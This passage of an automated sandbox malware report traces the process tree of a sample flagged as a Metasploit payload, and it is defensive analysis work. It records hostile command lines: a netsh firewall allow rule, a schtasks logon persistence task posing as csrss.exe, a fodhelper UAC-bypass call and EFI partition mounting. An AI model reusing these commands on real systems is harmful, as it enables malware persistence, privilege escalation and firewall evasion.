                                                                                                                          Date: Thu, 11 Nov 2021 00:58:41 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          x-powered-by: PHP/8.0.11
                                                                                                                          set-cookie: PHPSESSID=4ujbsd6crmkskigbel52akbion; path=/; HttpOnly
                                                                                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                          cache-control: no-store, no-cache, must-revalidate
                                                                                                                          pragma: no-cache
                                                                                                                          access-control-allow-credentials: false
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ryIHSGUMxFPJ%2F1e4qghNO%2FLH6YHJuD1QQg3lP1u0%2BXF1eYpABsushydm506ZkuU1RkdCCxRbUIoxtS3RvmeD7XMScKD9Nd4FY3%2Bt%2Fz7lrD9OZ3nlNfnYz5B0JVNarhQrNImsp3fS"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 6ac392db8b07f407-LHR
                                                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                          2021-11-11 00:58:41 UTC28INData Raw: 65 38 0d 0a 39 38 47 41 34 49 33 50 2f 6f 71 6a 79 76 69 64 75 6c 6d 66 71 58 53 32 54 74 4c 50 51 63 42 54 62 64 6c 47 49 72 39 45 68 30 66 57 32 78 4a 54 39 67 49 48 2f 6b 6d 39 45 35 54 4e 6c 57 47 50 77 78 79 2b 53 43 38 59 46 32 76 74 41 2b 30 51 73 66 42 6b 74 4a 75 4e 77 34 74 41 2b 4c 39 54 65 69 56 4b 4e 50 77 4b 52 51 46 66 7a 51 62 62 37 36 35 6b 71 74 57 45 31 5a 30 4a 77 4f 6f 2b 73 57 73 71 55 48 6c 63 74 57 37 76 66 73 73 57 45 37 73 62 63 57 36 6a 36 31 31 75 49 52 30 66 35 54 71 53 78 52 75 4c 42 58 33 51 69 55 6c 33 65 6e 50 39 4f 4e 77 4e 6c 74 78 71 75 59 67 35 74 53 41 79 35 30 6a 59 6e 77 74 66 32 44 35 6f 76 6a 64 66 32 6f 7a 48 6a 32 75 51 4f 71 70 6f 53 64 78 52 7a 41 3d 3d 0d 0a
                                                                                                                          Data Ascii: e898GA4I3P/oqjyvidulmfqXS2TtLPQcBTbdlGIr9Eh0fW2xJT9gIH/km9E5TNlWGPwxy+SC8YF2vtA+0QsfBktJuNw4tA+L9TeiVKNPwKRQFfzQbb765kqtWE1Z0JwOo+sWsqUHlctW7vfssWE7sbcW6j611uIR0f5TqSxRuLBX3QiUl3enP9ONwNltxquYg5tSAy50jYnwtf2D5ovjdf2ozHj2uQOqpoSdxRzA==
                                                                                                                          2021-11-11 00:58:41 UTC29INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Code Manipulations

                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          Analysis Process: 4t4y4r89UZ.exe PID: 5272 Parent PID: 4856

                                                                                                                          General

                                                                                                                          Start time:01:56:58
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Users\user\Desktop\4t4y4r89UZ.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\4t4y4r89UZ.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:4520488 bytes
                                                                                                                          MD5 hash:14C0D8425930CCEC0566B04864A05670
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.295699517.0000000005040000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.291152945.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                          Reputation:low

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: svchost.exe PID: 6436 Parent PID: 572

                                                                                                                          General

                                                                                                                          Start time:01:57:00
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: svchost.exe PID: 4072 Parent PID: 572

                                                                                                                          General

                                                                                                                          Start time:01:57:01
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: svchost.exe PID: 6272 Parent PID: 572

                                                                                                                          General

                                                                                                                          Start time:01:57:01
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: svchost.exe PID: 3076 Parent PID: 572

                                                                                                                          General

                                                                                                                          Start time:01:57:02
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: svchost.exe PID: 6336 Parent PID: 572

                                                                                                                          General

                                                                                                                          Start time:01:57:02
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: svchost.exe PID: 6896 Parent PID: 572

                                                                                                                          General

                                                                                                                          Start time:01:57:02
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: SgrmBroker.exe PID: 6784 Parent PID: 572

                                                                                                                          General

                                                                                                                          Start time:01:57:03
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                                          Imagebase:0x7ff7d8ac0000
                                                                                                                          File size:163336 bytes
                                                                                                                          MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: svchost.exe PID: 6848 Parent PID: 572

                                                                                                                          General

                                                                                                                          Start time:01:57:04
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: TrustedInstaller.exe PID: 6756 Parent PID: 572

                                                                                                                          General

                                                                                                                          Start time:01:57:04
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          Imagebase:0x7ff6564e0000
                                                                                                                          File size:131584 bytes
                                                                                                                          MD5 hash:4578046C54A954C917BB393B70BA0AEB
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: 4t4y4r89UZ.exe PID: 5300 Parent PID: 5272

                                                                                                                          General

                                                                                                                          Start time:01:57:05
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Users\user\Desktop\4t4y4r89UZ.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user\Desktop\4t4y4r89UZ.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:4520488 bytes
                                                                                                                          MD5 hash:14C0D8425930CCEC0566B04864A05670
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000002.317378119.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000A.00000002.321014783.0000000004FD0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: cmd.exe PID: 2012 Parent PID: 5300

                                                                                                                          General

                                                                                                                          Start time:01:57:11
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                                                                                                          Imagebase:0x7ff64bd60000
                                                                                                                          File size:273920 bytes
                                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: conhost.exe PID: 7108 Parent PID: 2012

                                                                                                                          General

                                                                                                                          Start time:01:57:11
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: netsh.exe PID: 7080 Parent PID: 2012

                                                                                                                          General

                                                                                                                          Start time:01:57:11
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                                                          Imagebase:0x7ff7c1c10000
                                                                                                                          File size:92672 bytes
                                                                                                                          MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: csrss.exe PID: 3192 Parent PID: 5300

                                                                                                                          General

                                                                                                                          Start time:01:57:13
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\rss\csrss.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\rss\csrss.exe /305-305
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:4520488 bytes
                                                                                                                          MD5 hash:14C0D8425930CCEC0566B04864A05670
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000E.00000003.327032138.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000E.00000002.554614867.0000000005700000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 39%, ReversingLabs

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: csrss.exe PID: 1240 Parent PID: 3352

                                                                                                                          General

                                                                                                                          Start time:01:57:20
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\rss\csrss.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\rss\csrss.exe"
                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                          File size:4520488 bytes
                                                                                                                          MD5 hash:14C0D8425930CCEC0566B04864A05670
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000010.00000003.333119737.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000010.00000002.365686923.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: svchost.exe PID: 6580 Parent PID: 572

                                                                                                                          General

                                                                                                                          Start time:01:57:23
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                          Imagebase:0x7ff70d6e0000
                                                                                                                          File size:51288 bytes
                                                                                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: schtasks.exe PID: 4036 Parent PID: 3192

                                                                                                                          General

                                                                                                                          Start time:01:57:24
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                                                                          Imagebase:0x7ff7d1430000
                                                                                                                          File size:226816 bytes
                                                                                                                          MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: conhost.exe PID: 4004 Parent PID: 4036

                                                                                                                          General

                                                                                                                          Start time:01:57:25
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: schtasks.exe PID: 7076 Parent PID: 3192

                                                                                                                          General

                                                                                                                          Start time:01:57:25
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:schtasks /delete /tn ScheduledUpdate /f
                                                                                                                          Imagebase:0x7ff7d1430000
                                                                                                                          File size:226816 bytes
                                                                                                                          MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: conhost.exe PID: 7100 Parent PID: 7076

                                                                                                                          General

                                                                                                                          Start time:01:57:25
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: csrss.exe PID: 7108 Parent PID: 664

                                                                                                                          General

                                                                                                                          Start time:01:57:25
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\rss\csrss.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\rss\csrss.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:4520488 bytes
                                                                                                                          MD5 hash:14C0D8425930CCEC0566B04864A05670
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000017.00000003.358520385.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000017.00000002.393659101.0000000005700000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: mountvol.exe PID: 5656 Parent PID: 3192

                                                                                                                          General

                                                                                                                          Start time:01:57:25
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:mountvol B: /s
                                                                                                                          Imagebase:0x900000
                                                                                                                          File size:15360 bytes
                                                                                                                          MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: conhost.exe PID: 3012 Parent PID: 5656

                                                                                                                          General

                                                                                                                          Start time:01:57:26
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: cmd.exe PID: 7140 Parent PID: 1240

                                                                                                                          General

                                                                                                                          Start time:01:57:26
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Sysnative\cmd.exe /C fodhelper
                                                                                                                          Imagebase:0x7ff64bd60000
                                                                                                                          File size:273920 bytes
                                                                                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: mountvol.exe PID: 2224 Parent PID: 3192

                                                                                                                          General

                                                                                                                          Start time:01:57:27
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:mountvol B: /d
                                                                                                                          Imagebase:0x900000
                                                                                                                          File size:15360 bytes
                                                                                                                          MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: conhost.exe PID: 5580 Parent PID: 7140

                                                                                                                          General

                                                                                                                          Start time:01:57:27
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: fodhelper.exe PID: 6256 Parent PID: 7140

                                                                                                                          General

                                                                                                                          Start time:01:57:27
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\fodhelper.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:fodhelper
                                                                                                                          Imagebase:0x7ff7a9b10000
                                                                                                                          File size:46080 bytes
                                                                                                                          MD5 hash:1D1F9E564472A9698F1BE3F9FEB9864B
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: conhost.exe PID: 5800 Parent PID: 2224

                                                                                                                          General

                                                                                                                          Start time:01:57:27
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: fodhelper.exe PID: 5776 Parent PID: 7140

                                                                                                                          General

                                                                                                                          Start time:01:57:28
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\fodhelper.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                          Imagebase:0x7ff7a9b10000
                                                                                                                          File size:46080 bytes
                                                                                                                          MD5 hash:1D1F9E564472A9698F1BE3F9FEB9864B
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: mountvol.exe PID: 5784 Parent PID: 3192

                                                                                                                          General

                                                                                                                          Start time:01:57:28
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:mountvol B: /s
                                                                                                                          Imagebase:0x900000
                                                                                                                          File size:15360 bytes
                                                                                                                          MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: csrss.exe PID: 3016 Parent PID: 3352

                                                                                                                          General

                                                                                                                          Start time:01:57:29
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\rss\csrss.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\rss\csrss.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:4520488 bytes
                                                                                                                          MD5 hash:14C0D8425930CCEC0566B04864A05670
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000022.00000003.354921763.000000000638A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000022.00000002.388262330.0000000005700000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000022.00000002.377614000.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: conhost.exe PID: 1956 Parent PID: 5784

                                                                                                                          General

                                                                                                                          Start time:01:57:29
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: mountvol.exe PID: 7104 Parent PID: 3192

                                                                                                                          General

                                                                                                                          Start time:01:57:30
                                                                                                                          Start date:11/11/2021
                                                                                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:mountvol B: /d
